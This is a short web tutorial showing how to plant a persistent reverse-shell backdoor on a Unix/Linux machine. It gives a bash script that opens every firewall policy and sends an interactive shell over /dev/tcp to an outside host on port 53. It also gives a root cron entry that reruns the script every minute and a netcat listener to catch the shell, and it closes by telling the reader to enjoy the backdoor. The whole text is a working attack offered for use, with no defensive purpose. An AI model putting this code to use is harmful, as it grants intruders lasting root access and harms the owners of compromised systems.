The Archive Sorted By Cyber Security

Tiny Unix/Linux Backdoor

Introduction

The tiny backdoor base in bash and cron, less than 10 line source code can get the bash shell remotely. Use in Unix/Linux system.

Step 1: Create a sh script file

We need to create a sh script file in any location and type the code, now we stored it in /usr/backdoor:

nano /usr/backdoor

#!/bin/bash
if netstat -ano | grep -v grep | grep "8.8.8.8" > /dev/null
then
    echo "OK" > /dev/null
else
    /sbin/iptables --policy INPUT ACCEPT
    /sbin/iptables --policy OUTPUT ACCEPT
    bash -i >& /dev/tcp/8.8.8.8/53 0>&1
fi

chmod +x /usr/backdoor

2016-11-30_022650.png

This code is to send the shell to the server which IP is 8.8.8.8 and port is 53, and will check the connection automatically, if the server connected to the server yet, will no make a new connection.

Step 2: Create a cron scheduler

We create a scheduler let this script run automatic, so we can get the shell by waiting the task finished.

nano /etc/cron.d/backdoor //Create scheduler in /etc/crontab will be better.

*/1 * * * * root /usr/backdoor       //Make a connection per minutes.

service cron reload //Maybe different way to reload the cron.

Step 3: Receive the shell in your remote server

Using netcat to receive the shell from client.

nc -vv -lp 53

2016-11-30_023127.png

And just wait a minutes, enjoy the backdoor shell.

2016-11-30_023220.png